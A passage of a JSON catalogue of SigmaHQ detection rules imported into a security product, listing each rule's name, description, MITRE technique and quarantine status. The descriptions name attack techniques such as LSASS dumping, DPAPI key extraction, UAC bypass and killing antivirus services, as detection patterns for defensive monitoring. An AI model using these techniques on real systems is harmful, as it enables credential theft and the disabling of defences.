PowerShell Mailbox Export to Share - PS", "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-mailbox-export-to-share-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" } }, { "id": "sigmahq-sigma-4a2a2c3e-209f-4d01-b513-4155a540b469", "type": "detection", "name": "Suspicious MsiExec Embedding Parent", "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-embedding-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" } }, { "id": "sigmahq-sigma-4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml" } }, { "id": "sigmahq-sigma-4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "type": "detection", "name": "PowerShell as a Service in Registry", "description": "Detects that a powershell code is written to the registry as a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-as-a-service-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" } }, { "id": "sigmahq-sigma-4a6713f6-3331-11ed-a261-0242ac120002", "type": "detection", "name": "Taskkill Symantec Endpoint Protection", "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/taskkill-symantec-endpoint-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a6713f6-3331-11ed-a261-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" } }, { "id": "sigmahq-sigma-4aa6040b-3f28-44e3-a769-9208e5feb5ec", "type": "detection", "name": "Suspicious Rundll32 Execution With Image Extension", "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-execution-with-image-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml" } }, { "id": "sigmahq-sigma-4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "type": "detection", "name": "Writing Local Admin Share", "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/writing-local-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" } }, { "id": "sigmahq-sigma-4abc0ec4-db5a-412f-9632-26659cddf145", "type": "detection", "name": "UEFI Persistence Via Wpbbin - ProcessCreation", "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uefi-persistence-via-wpbbin-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4abc0ec4-db5a-412f-9632-26659cddf145", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml" } }, { "id": "sigmahq-sigma-4ac1f50b-3bd0-4968-902d-868b4647937e", "type": "detection", "name": "DPAPI Domain Backup Key Extraction", "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-domain-backup-key-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" } }, { "id": "sigmahq-sigma-4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "type": "detection", "name": "TrustedPath UAC Bypass Pattern", "description": "Detects indicators of a UAC bypass method by mocking directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trustedpath-uac-bypass-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" } }, { "id": "sigmahq-sigma-4ad97bf5-a514-41a4-abd3-4f3455ad4865", "type": "detection", "name": "Guest Users Invited To Tenant By Non Approved Inviters", "description": "Detects guest users being invited to tenant by non-approved inviters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/guest-users-invited-to-tenant-by-non-approved-inviters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" } }, { "id": "sigmahq-sigma-4ae3e30b-b03f-43aa-87e3-b622f4048eed", "type": "detection", "name": "Potential Arbitrary File Download Using Office Application", "description": "Detects potential arbitrary file download using a Microsoft Office application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-file-download-using-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" } }, { "id": "sigmahq-sigma-4ae68615-866f-4304-b24b-ba048dfa5ca7", "type": "detection", "name": "AWS ElastiCache Security Group Created", "description": "Detects when an ElastiCache security group has been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-elasticache-security-group-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml" } }, { "id": "sigmahq-sigma-4ae81040-fc1c-4249-bfa3-938d260214d9", "type": "detection", "name": "Use Icacls to Hide File to Everyone", "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-icacls-to-hide-file-to-everyone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_icacls_deny.yml" } }, { "id": "sigmahq-sigma-4afac85c-224a-4dd7-b1af-8da40e1c60bd", "type": "detection", "name": "Account Disabled or Blocked for Sign in Attempts", "description": "Detects when an account is disabled or blocked for sign in but tried to log in", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-disabled-or-blocked-for-sign-in-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml" } }, { "id": "sigmahq-sigma-4b046706-5789-4673-b111-66f25fe99534", "type": "detection", "name": "Deleted Data Overwritten Via Cipher.EXE", "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deleted-data-overwritten-via-cipher-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b046706-5789-4673-b111-66f25fe99534", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml" } }, { "id": "sigmahq-sigma-4b09c71e-4269-4111-9cdd-107d8867f0cc", "type": "detection", "name": "Shell Execution via Flock - Linux", "description": "Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-flock-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b09c71e-4269-4111-9cdd-107d8867f0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml" } }, { "id": "sigmahq-sigma-4b13db67-0c45-40f1-aba8-66a1a7198a1e", "type": "detection", "name": "Suspicious Extrac32 Alternate Data Stream Execution", "description": "Extract data from cab file and hide it in an alternate data stream", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-extrac32-alternate-data-stream-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" } }, { "id": "sigmahq-sigma-4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "type": "detection", "name": "Modification of ld.so.preload", "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-of-ld-so-preload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml" } }, { "id": "sigmahq-sigma-4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "type": "detection", "name": "CMSTP UAC Bypass via COM Object Access", "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002", "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-uac-bypass-via-com-object-access.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" } }, { "id": "sigmahq-sigma-4b657234-038e-4ad5-997c-4be42340bce4", "type": "detection", "name": "Network Connection Initiated To Visual Studio Code Tunnels Domain", "description": "Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-visual-studio-code-tunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b657234-038e-4ad5-997c-4be42340bce4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml" } }, { "id": "sigmahq-sigma-4b89abaa-99fe-4232-afdd-8f9aa4d20382", "type": "detection", "name": "Potentially Suspicious Malware Callback Communication", "description": "Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-malware-callback-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml" } }, { "id": "sigmahq-sigma-4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d", "type": "detection", "name": "RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class", "description": "Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.\nIn PowerShell one-liner commands, the \"SetAllowTSConnections\" method of the \"Win32_TerminalServiceSetting\" class may be used to enable or disable RDP.\nIn WMIC, the \"rdtoggle\" alias or \"Win32_TerminalServiceSetting\" class may be used for the same purpose.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-enable-or-disable-via-win32-terminalservicesetting-wmi-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b8f6d3a-9c5e-4f2a-a7d8-6b9c3e5f2a8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml" } }, { "id": "sigmahq-sigma-4b991083-3d0e-44ce-8fc4-b254025d8d4b", "type": "detection", "name": "Unusual Parent Process For Cmd.EXE", "description": "Detects suspicious parent process for cmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-parent-process-for-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml" } }, { "id": "sigmahq-sigma-4bb79b62-ef12-4861-981d-2aab43fab642", "type": "detection", "name": "TacticalRMM Service Installation", "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tacticalrmm-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bb79b62-ef12-4861-981d-2aab43fab642", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml" } }, { "id": "sigmahq-sigma-4bb80281-3756-4ec8-a88e-523c5a6fda9e", "type": "detection", "name": "New Root Certificate Authority Added", "description": "Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-authority-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bb80281-3756-4ec8-a88e-523c5a6fda9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml" } }, { "id": "sigmahq-sigma-4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c", "type": "detection", "name": "Suspicious Velociraptor Child Process", "description": "Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-velociraptor-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_velociraptor_child_process.yml" } }, { "id": "sigmahq-sigma-4be8b654-0c01-4c9d-a10c-6b28467fc651", "type": "detection", "name": "LSASS Access From Potentially White-Listed Processes", "description": "Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-from-potentially-white-listed-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml" } }, { "id": "sigmahq-sigma-4beb6ae0-f85b-41e2-8f18-8668abc8af78", "type": "detection", "name": "Sysinternals PsSuspend Suspicious Execution", "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-pssuspend-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml" } }, { "id": "sigmahq-sigma-4bf943c6-5146-4273-98dd-e958fd1e3abf", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" } }, { "id": "sigmahq-sigma-4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "type": "detection", "name": "Process Access via TrolleyExpress Exclusion", "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ 